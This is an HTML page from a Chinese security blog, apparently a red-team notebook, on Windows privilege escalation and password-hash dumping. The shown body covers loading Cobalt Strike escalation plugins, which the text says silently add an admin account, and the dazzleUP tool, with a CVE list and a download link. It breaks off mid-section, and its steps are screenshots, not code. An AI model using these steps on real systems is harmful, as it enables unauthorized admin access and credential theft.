<!DOCTYPE html>
<html>
<head>
    

    

    



    <meta charset="utf-8">
    
    
    
    
    <title>提权与hash读取 | 小白帽</title>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    
    <meta name="theme-color" content="#3F51B5">
    
    
    <meta name="keywords" content="">
    <meta name="description" content="Cobalt strike插件获取与加载                                                                                             image.png">
<meta property="og:type" content="article">
<meta property="og:title" content="提权与hash读取">
<meta property="og:url" content="https://www.yuque.com/xiaogege-yxttw/2020/08/06/gca6ds/index.html">
<meta property="og:site_name" content="小白帽">
<meta property="og:description" content="Cobalt strike插件获取与加载                                                                                             image.png">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596166883843-b72659ca-5d34-4936-ba24-5e350c0fa059.png#align=left&display=inline&height=414&margin=%5Bobject%20Object%5D&name=image.png&originHeight=828&originWidth=1547&size=180848&status=done&style=none&width=773.5">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596166941561-5f3c4737-040c-4ec2-a4bc-96b06adf02a4.png#align=left&display=inline&height=131&margin=%5Bobject%20Object%5D&name=image.png&originHeight=261&originWidth=1544&size=111899&status=done&style=none&width=772">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596166969324-7180629a-5271-4c88-9fdf-b5da64c79cea.png#align=left&display=inline&height=76&margin=%5Bobject%20Object%5D&name=image.png&originHeight=152&originWidth=1918&size=9766&status=done&style=none&width=959">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1595925819177-4400dd87-2214-4d1d-adbf-488394802020.png#align=left&display=inline&height=149&margin=%5Bobject%20Object%5D&name=image.png&originHeight=298&originWidth=1546&size=136987&status=done&style=none&width=773">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1595925883537-998ec7ea-d39d-404c-8d4c-1554ffd6391a.png#align=left&display=inline&height=208&margin=%5Bobject%20Object%5D&name=image.png&originHeight=415&originWidth=622&size=26255&status=done&style=none&width=311">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1595925903776-edaf48f5-bedc-403d-a5af-90982c2df655.png#align=left&display=inline&height=333&margin=%5Bobject%20Object%5D&name=image.png&originHeight=665&originWidth=1920&size=36826&status=done&style=none&width=960">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1595925967065-384d6fc1-805c-4d3b-918f-094805b40d07.png#align=left&display=inline&height=169&margin=%5Bobject%20Object%5D&name=image.png&originHeight=337&originWidth=1539&size=153952&status=done&style=none&width=769.5">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1595925994576-c2883d29-3d97-48f7-b913-94ca72e92c2d.png#align=left&display=inline&height=242&margin=%5Bobject%20Object%5D&name=image.png&originHeight=485&originWidth=1538&size=180228&status=done&style=none&width=769">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596532091691-deab4768-1787-4255-93e2-3892011d8f0b.png#align=left&display=inline&height=414&margin=%5Bobject%20Object%5D&name=image.png&originHeight=827&originWidth=1543&size=210678&status=done&style=none&width=771.5">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1595926243392-0d60b882-8fe0-4359-bf8a-89fdda70b939.png#align=left&display=inline&height=65&margin=%5Bobject%20Object%5D&name=image.png&originHeight=130&originWidth=1918&size=18089&status=done&style=none&width=959">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1595926383488-cba9dd90-c184-4dc5-aa78-59a2be84eb96.png#align=left&display=inline&height=267&margin=%5Bobject%20Object%5D&name=image.png&originHeight=534&originWidth=1443&size=142491&status=done&style=none&width=721.5">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596166663037-e40046b4-b8b9-4e95-a672-7b79a10c4806.png#align=left&display=inline&height=414&margin=%5Bobject%20Object%5D&name=image.png&originHeight=827&originWidth=1543&size=290531&status=done&style=none&width=771.5">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596607756437-39ba810f-575a-4c48-b6a2-e4483dc9f953.png#align=left&display=inline&height=414&margin=%5Bobject%20Object%5D&name=image.png&originHeight=827&originWidth=1542&size=272848&status=done&style=none&width=771">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596000779952-4cd72eaa-5b05-4eb8-be46-d00f0b1beb26.png#align=left&display=inline&height=147&margin=%5Bobject%20Object%5D&name=image.png&originHeight=294&originWidth=768&size=150643&status=done&style=none&width=384">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596000890644-6078e18e-ef93-4d8d-9824-603238f194b9.png#align=left&display=inline&height=398&margin=%5Bobject%20Object%5D&name=image.png&originHeight=796&originWidth=686&size=442463&status=done&style=none&width=343">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596000469388-84118202-63c8-4b65-9ce5-04dadf7a83d9.png#align=left&display=inline&height=214&margin=%5Bobject%20Object%5D&name=image.png&originHeight=429&originWidth=837&size=302009&status=done&style=none&width=418.5">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596000424542-fc3ea812-cffd-42e3-916e-df3a180d6d28.png#align=left&display=inline&height=224&margin=%5Bobject%20Object%5D&name=image.png&originHeight=448&originWidth=843&size=290122&status=done&style=none&width=421.5">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/gif/258143/1596009266490-76f7778a-1f4f-47e3-b0d0-93b12565bb24.gif#align=left&display=inline&height=650&margin=%5Bobject%20Object%5D&name=356325576.gif&originHeight=650&originWidth=979&size=670606&status=done&style=none&width=979">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/gif/258143/1596010859066-bacecdf1-6edb-4583-b67c-679a78109ab8.gif#align=left&display=inline&height=650&margin=%5Bobject%20Object%5D&name=2.gif&originHeight=650&originWidth=979&size=782929&status=done&style=none&width=979">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596093953631-d24a84b5-576c-46f2-aeb2-f5438eb9286d.png#align=left&display=inline&height=271&margin=%5Bobject%20Object%5D&name=image.png&originHeight=542&originWidth=1199&size=340191&status=done&style=none&width=599.5">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596110356894-42232318-6562-45fd-9eb2-4633ed105948.png#align=left&display=inline&height=56&margin=%5Bobject%20Object%5D&name=image.png&originHeight=112&originWidth=744&size=9918&status=done&style=none&width=372">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596110176792-e82ae15d-5951-40e8-a6f1-b88ee2ab5f60.png#align=left&display=inline&height=360&margin=%5Bobject%20Object%5D&name=image.png&originHeight=720&originWidth=710&size=60918&status=done&style=none&width=355">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596000569316-64cbe683-6fb9-41eb-bb90-8196371282ef.png#align=left&display=inline&height=368&margin=%5Bobject%20Object%5D&name=image.png&originHeight=736&originWidth=1388&size=99563&status=done&style=none&width=694">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596604208017-b970f6a2-9ea9-4151-b062-2babcf0194f5.png#align=left&display=inline&height=111&margin=%5Bobject%20Object%5D&name=image.png&originHeight=222&originWidth=630&size=69607&status=done&style=none&width=315">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596605167992-81ee5259-2054-47d2-80c9-b7f93992ccf3.png#align=left&display=inline&height=145&margin=%5Bobject%20Object%5D&name=image.png&originHeight=290&originWidth=723&size=31801&status=done&style=none&width=361.5">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596605194766-0e11828f-9540-42c4-bf4a-18a496b21141.png#align=left&display=inline&height=131&margin=%5Bobject%20Object%5D&name=image.png&originHeight=261&originWidth=825&size=13034&status=done&style=none&width=412.5">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596891469135-620967c1-d803-4872-ae43-cfeaff5e3f6a.png#align=left&display=inline&height=133&margin=%5Bobject%20Object%5D&name=image.png&originHeight=265&originWidth=801&size=20220&status=done&style=none&width=400.5">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596877277818-50b18d70-8d61-4439-9ffa-16db6fe5308d.png#align=left&display=inline&height=307&margin=%5Bobject%20Object%5D&name=image.png&originHeight=614&originWidth=838&size=41359&status=done&style=none&width=419">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596877444914-f56ff8e1-37bb-4625-86be-75a323e50316.png#align=left&display=inline&height=359&margin=%5Bobject%20Object%5D&name=image.png&originHeight=718&originWidth=781&size=37748&status=done&style=none&width=390.5">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596878161275-a41963ad-fce9-4c76-aea7-0be5c57ebc31.png#align=left&display=inline&height=153&margin=%5Bobject%20Object%5D&name=image.png&originHeight=305&originWidth=1055&size=88821&status=done&style=none&width=527.5">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596877960841-32d91383-e94e-4bae-a735-8643a3d32347.png#align=left&display=inline&height=78&margin=%5Bobject%20Object%5D&name=image.png&originHeight=156&originWidth=618&size=10573&status=done&style=none&width=309">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596608521335-f990db60-acfd-4de2-97f9-17ca8ba2726e.png#align=left&display=inline&height=332&margin=%5Bobject%20Object%5D&name=image.png&originHeight=664&originWidth=1920&size=59020&status=done&style=none&width=960">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596609640544-3e20638a-338e-4161-84e1-0c102c3b9d45.png#align=left&display=inline&height=274&margin=%5Bobject%20Object%5D&name=image.png&originHeight=547&originWidth=1059&size=186262&status=done&style=none&width=529.5">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596609726168-d450dd2b-e970-4422-9897-e48176916f36.png#align=left&display=inline&height=144&margin=%5Bobject%20Object%5D&name=image.png&originHeight=144&originWidth=1054&size=32038&status=done&style=none&width=1054">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596609782138-e97f2179-d252-4a8f-a460-d384e1e6f469.png#align=left&display=inline&height=303&margin=%5Bobject%20Object%5D&name=image.png&originHeight=303&originWidth=1059&size=147309&status=done&style=none&width=1059">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596610350819-1360ceed-cdbf-4c28-aa08-9b4938983618.png#align=left&display=inline&height=703&margin=%5Bobject%20Object%5D&name=image.png&originHeight=703&originWidth=835&size=98614&status=done&style=none&width=835">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596610363202-583ab935-4d08-48ac-8ff1-c2f74d90a3ee.png#align=left&display=inline&height=677&margin=%5Bobject%20Object%5D&name=image.png&originHeight=677&originWidth=733&size=135271&status=done&style=none&width=733">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596604853921-977a6384-5251-46a9-8977-a9c08820f9be.png#align=left&display=inline&height=103&margin=%5Bobject%20Object%5D&name=image.png&originHeight=206&originWidth=519&size=13475&status=done&style=none&width=259.5">
<meta property="article:published_time" content="2020-08-06T14:49:23.000Z">
<meta property="article:modified_time" content="2020-08-14T15:17:20.626Z">
<meta property="article:author" content="无名之辈">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596166883843-b72659ca-5d34-4936-ba24-5e350c0fa059.png#align=left&display=inline&height=414&margin=%5Bobject%20Object%5D&name=image.png&originHeight=828&originWidth=1547&size=180848&status=done&style=none&width=773.5">
    
    <link rel="shortcut icon" href="/favicon.ico">
    <link rel="stylesheet" href="//unpkg.com/hexo-theme-material-indigo@latest/css/style.css">
    <script>window.lazyScripts=[]</script>

    <!-- custom head -->
    

<meta name="generator" content="Hexo 4.2.1"></head>

<body>
    <div id="loading" class="active"></div>

    <aside id="menu" class="hide" >
  <div class="inner flex-row-vertical">
    <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="menu-off">
        <i class="icon icon-lg icon-close"></i>
    </a>
    <div class="brand-wrap" style="background-image:url(/img/brand.jpg)">
      <div class="brand">
        <a href="/" class="avatar waves-effect waves-circle waves-light">
          <img src="/img/avatar.jpg">
        </a>
        <hgroup class="introduce">
          <h5 class="nickname">无名之辈</h5>
          <a href="mailto:3389006233@qq.com" title="3389006233@qq.com" class="mail">3389006233@qq.com</a>
        </hgroup>
      </div>
    </div>
    <div class="scroll-wrap flex-col">
      <ul class="nav">
        
            <li class="waves-block waves-effect">
              <a href="/"  >
                <i class="icon icon-lg icon-home"></i>
                主页
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="https://github.com/wakaka123wakaka" target="_blank" >
                <i class="icon icon-lg icon-github"></i>
                Github
              </a>
            </li>
        
      </ul>
    </div>
  </div>
</aside>

    <main id="main">
        <header class="top-header" id="header">
    <div class="flex-row">
        <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light on" id="menu-toggle">
          <i class="icon icon-lg icon-navicon"></i>
        </a>
        <div class="flex-col header-title ellipsis">提权与hash读取</div>
        
        <div class="search-wrap" id="search-wrap">
            <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="back">
                <i class="icon icon-lg icon-chevron-left"></i>
            </a>
            <input type="text" id="key" class="search-input" autocomplete="off" placeholder="Search">
            <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="search">
                <i class="icon icon-lg icon-search"></i>
            </a>
        </div>
        
        
        <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="menuShare">
            <i class="icon icon-lg icon-share-alt"></i>
        </a>
        
    </div>
</header>
<header class="content-header post-header">

    <div class="container fade-scale">
        <h1 class="title">提权与hash读取</h1>
        <h5 class="subtitle">
            
                <time datetime="2020-08-06T14:49:23.000Z" itemprop="datePublished" class="page-time">
  2020-08-06
</time>


            
        </h5>
    </div>

    


</header>
<meta name="referrer" content="no-referrer" />
<script type="text/javascript" src="hexo_resize_image.js"></script>

<div class="container body-wrap">
    
    <aside class="post-widget">
        <nav class="post-toc-wrap post-toc-shrink" id="post-toc">
            <h4>TOC</h4>
            <ol class="post-toc"><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#Cobalt-strike"><span class="post-toc-number">1.</span> <span class="post-toc-text">Cobalt strike</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#插件获取与加载"><span class="post-toc-number">1.1.</span> <span class="post-toc-text">插件获取与加载</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#Cobalt-strike-提权"><span class="post-toc-number">1.2.</span> <span class="post-toc-text">Cobalt strike 提权</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#elevate-cna-提权"><span class="post-toc-number">1.2.0.1.</span> <span class="post-toc-text">elevate.cna 提权</span></a></li></ol></li></ol></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#dazzleUP（漏洞检测）"><span class="post-toc-number">1.3.</span> <span class="post-toc-text">dazzleUP（漏洞检测）</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#梼杌taowu-cobalt-strike-master-zip"><span class="post-toc-number">1.4.</span> <span class="post-toc-text">梼杌taowu-cobalt-strike-master.zip</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#提权完成标志"><span class="post-toc-number">1.5.</span> <span class="post-toc-text">提权完成标志</span></a></li></ol></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#MSF-提权"><span class="post-toc-number">2.</span> <span class="post-toc-text">MSF 提权</span></a></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#常规提权"><span class="post-toc-number">3.</span> <span class="post-toc-text">常规提权</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#CVE-2019-0803CVE-2019-0803-zip"><span class="post-toc-number">3.1.</span> <span class="post-toc-text">CVE-2019-0803CVE-2019-0803.zip</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#CVE-2020-0787BitsArbitraryFileMoveExploit-zip"><span class="post-toc-number">3.2.</span> <span class="post-toc-text">CVE-2020-0787BitsArbitraryFileMoveExploit.zip</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#ms16-32-还未测试-Invoke-MS16-032-ps1"><span class="post-toc-number">3.3.</span> <span class="post-toc-text">ms16-32(还未测试)Invoke-MS16-032.ps1</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#本地提权"><span class="post-toc-number">3.3.0.1.</span> <span class="post-toc-text">本地提权</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#远程给加载提权"><span class="post-toc-number">3.3.0.2.</span> <span class="post-toc-text">远程给加载提权</span></a></li></ol></li></ol></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#dazzleUP（漏洞检测）dazzleUP-zip"><span class="post-toc-number">3.4.</span> <span class="post-toc-text">dazzleUP（漏洞检测）dazzleUP.zip</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#BadPotato-提权Release-zip"><span class="post-toc-number">3.5.</span> <span class="post-toc-text">BadPotato 提权Release.zip</span></a></li></ol></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#提权查询"><span class="post-toc-number">4.</span> <span class="post-toc-text">提权查询</span></a></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#Hash-读取（管理员权限）"><span class="post-toc-number">5.</span> <span class="post-toc-text">Hash 读取（管理员权限）</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#使用-pwdump7-获取-hash"><span class="post-toc-number">5.1.</span> <span class="post-toc-text">使用 pwdump7 获取 hash</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#提权"><span class="post-toc-number">5.1.0.1.</span> <span class="post-toc-text">提权</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#hash-读取Pwdump7-zip"><span class="post-toc-number">5.1.0.2.</span> <span class="post-toc-text">hash 读取Pwdump7.zip</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#拿到-hash-直接破解："><span class="post-toc-number">5.1.0.3.</span> <span class="post-toc-text">拿到 hash 直接破解：</span></a></li></ol></li></ol></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#mimikatz-抓取-hash"><span class="post-toc-number">5.2.</span> <span class="post-toc-text">mimikatz 抓取 hash</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#执行命令mimikatz-trunk-zip"><span class="post-toc-number">5.2.0.1.</span> <span class="post-toc-text">执行命令mimikatz_trunk.zip</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#如果权限不足则会提示"><span class="post-toc-number">5.2.0.2.</span> <span class="post-toc-text">如果权限不足则会提示</span></a></li></ol></li></ol></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#MSF-抓取-hash"><span class="post-toc-number">5.3.</span> <span class="post-toc-text">MSF 抓取 hash</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#Cobalt-Strike-抓取-hash"><span class="post-toc-number">5.4.</span> <span class="post-toc-text">Cobalt Strike 抓取 hash</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#1、抓取-hash（通过-cobalt-strike）"><span class="post-toc-number">5.4.0.1.</span> <span class="post-toc-text">1、抓取 hash（通过 cobalt strike）</span></a></li></ol></li></ol></li></ol></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#端口转发"><span class="post-toc-number">6.</span> <span class="post-toc-text">端口转发</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#MSF-端口转发"><span class="post-toc-number">6.1.</span> <span class="post-toc-text">MSF 端口转发</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#ew"><span class="post-toc-number">6.2.</span> <span class="post-toc-text">ew</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#常见问题解决办法"><span class="post-toc-number">6.3.</span> <span class="post-toc-text">常见问题解决办法</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#服务端口默认被修改"><span class="post-toc-number">6.3.0.1.</span> <span class="post-toc-text">服务端口默认被修改</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#服务器未开启-3389"><span class="post-toc-number">6.3.0.2.</span> <span class="post-toc-text">服务器未开启 3389</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#服务器网络环境处于内网："><span class="post-toc-number">6.3.0.3.</span> <span class="post-toc-text">服务器网络环境处于内网：</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#防护验证规则-IP-或计算机名："><span class="post-toc-number">6.3.0.4.</span> <span class="post-toc-text">防护验证规则&#x2F;IP 或计算机名：</span></a></li></ol></li></ol></li></ol></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#注意："><span class="post-toc-number">7.</span> <span class="post-toc-text">注意：</span></a></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#学习文档"><span class="post-toc-number">8.</span> <span class="post-toc-text">学习文档</span></a></li></ol>
        </nav>
    </aside>


<article id="post-gca6ds"
  class="post-article article-type-post fade" itemprop="blogPost">

    <div class="post-card">
        <h1 class="post-card-title">提权与hash读取</h1>
        <div class="post-meta">
            <time class="post-time" title="2020-08-06 22:49:23" datetime="2020-08-06T14:49:23.000Z"  itemprop="datePublished">2020-08-06</time>

            


            
<span id="busuanzi_container_page_pv" title="文章总阅读量" style='display:none'>
    <i class="icon icon-eye icon-pr"></i><span id="busuanzi_value_page_pv"></span>
</span>


        </div>
        <div class="post-content" id="post-content" itemprop="postContent">
            <h1 id="Cobalt-strike"><a href="#Cobalt-strike" class="headerlink" title="Cobalt strike"></a>Cobalt strike</h1><h2 id="插件获取与加载"><a href="#插件获取与加载" class="headerlink" title="插件获取与加载"></a><a href="https://mp.weixin.qq.com/s/CEI1XYkq2PZmYsP0DRU7jg" target="_blank" rel="noopener">插件获取与加载</a></h2><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596166883843-b72659ca-5d34-4936-ba24-5e350c0fa059.png#align=left&display=inline&height=414&margin=%5Bobject%20Object%5D&name=image.png&originHeight=828&originWidth=1547&size=180848&status=done&style=none&width=773.5" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596166941561-5f3c4737-040c-4ec2-a4bc-96b06adf02a4.png#align=left&display=inline&height=131&margin=%5Bobject%20Object%5D&name=image.png&originHeight=261&originWidth=1544&size=111899&status=done&style=none&width=772" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>表示加载成功</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596166969324-7180629a-5271-4c88-9fdf-b5da64c79cea.png#align=left&display=inline&height=76&margin=%5Bobject%20Object%5D&name=image.png&originHeight=152&originWidth=1918&size=9766&status=done&style=none&width=959" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

<h2 id="Cobalt-strike-提权"><a href="#Cobalt-strike-提权" class="headerlink" title="Cobalt strike 提权"></a>Cobalt strike 提权</h2><h4 id="elevate-cna-提权"><a href="#elevate-cna-提权" class="headerlink" title="elevate.cna 提权"></a>elevate.cna 提权</h4><p>1、加载脚本</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1595925819177-4400dd87-2214-4d1d-adbf-488394802020.png#align=left&display=inline&height=149&margin=%5Bobject%20Object%5D&name=image.png&originHeight=298&originWidth=1546&size=136987&status=done&style=none&width=773" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>2、脚本选择</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1595925883537-998ec7ea-d39d-404c-8d4c-1554ffd6391a.png#align=left&display=inline&height=208&margin=%5Bobject%20Object%5D&name=image.png&originHeight=415&originWidth=622&size=26255&status=done&style=none&width=311" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>3、脚本加载成功</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1595925903776-edaf48f5-bedc-403d-a5af-90982c2df655.png#align=left&display=inline&height=333&margin=%5Bobject%20Object%5D&name=image.png&originHeight=665&originWidth=1920&size=36826&status=done&style=none&width=960" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>4、脚本使用</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1595925967065-384d6fc1-805c-4d3b-918f-094805b40d07.png#align=left&display=inline&height=169&margin=%5Bobject%20Object%5D&name=image.png&originHeight=337&originWidth=1539&size=153952&status=done&style=none&width=769.5" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1595925994576-c2883d29-3d97-48f7-b913-94ca72e92c2d.png#align=left&display=inline&height=242&margin=%5Bobject%20Object%5D&name=image.png&originHeight=485&originWidth=1538&size=180228&status=done&style=none&width=769" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>通过 net user 查询已经为管理员权限，并且会自动新增一个</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596532091691-deab4768-1787-4255-93e2-3892011d8f0b.png#align=left&display=inline&height=414&margin=%5Bobject%20Object%5D&name=image.png&originHeight=827&originWidth=1543&size=210678&status=done&style=none&width=771.5" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

<h2 id="dazzleUP（漏洞检测）"><a href="#dazzleUP（漏洞检测）" class="headerlink" title="dazzleUP（漏洞检测）"></a>dazzleUP（漏洞检测）</h2><p>适用：windows 10</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">DCOM/NTLM Reflection (Rotten/Juicy Potato) Vulnerability</span><br><span class="line">CVE<span class="literal">-2019</span><span class="literal">-0836</span></span><br><span class="line">CVE<span class="literal">-2019</span><span class="literal">-0841</span></span><br><span class="line">CVE<span class="literal">-2019</span><span class="literal">-1064</span></span><br><span class="line">CVE<span class="literal">-2019</span><span class="literal">-1130</span></span><br><span class="line">CVE<span class="literal">-2019</span><span class="literal">-1253</span></span><br><span class="line">CVE<span class="literal">-2019</span><span class="literal">-1385</span></span><br><span class="line">CVE<span class="literal">-2019</span><span class="literal">-1388</span></span><br><span class="line">CVE<span class="literal">-2019</span><span class="literal">-1405</span></span><br><span class="line">CVE<span class="literal">-2019</span><span class="literal">-1315</span></span><br><span class="line">CVE<span class="literal">-2020</span><span class="literal">-0787</span></span><br><span class="line">CVE<span class="literal">-2020</span><span class="literal">-0796</span></span><br></pre></td></tr></table></figure>

<p>1、脚本加载<a href="https://www.yuque.com/attachments/yuque/0/2020/zip/258143/1596725365058-75ce7cc5-9373-4d5d-8c65-9cb244eb55b0.zip?_lake_card=%7B%22uid%22%3A%221596093526438-0%22%2C%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2020%2Fzip%2F258143%2F1596725365058-75ce7cc5-9373-4d5d-8c65-9cb244eb55b0.zip%22%2C%22name%22%3A%22dazzleUP-master.zip%22%2C%22size%22%3A90335%2C%22type%22%3A%22application%2Fx-zip-compressed%22%2C%22ext%22%3A%22zip%22%2C%22progress%22%3A%7B%22percent%22%3A99%7D%2C%22status%22%3A%22done%22%2C%22percent%22%3A0%2C%22id%22%3A%22TWeKr%22%2C%22card%22%3A%22file%22%7D">dazzleUP-master.zip</a><br>dazzleUP.cna 和 dazzleUP_Reflective_DLL.dll 放在同一目录下</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1595926243392-0d60b882-8fe0-4359-bf8a-89fdda70b939.png#align=left&display=inline&height=65&margin=%5Bobject%20Object%5D&name=image.png&originHeight=130&originWidth=1918&size=18089&status=done&style=none&width=959" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>2、直接在 beacaon 下使用</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
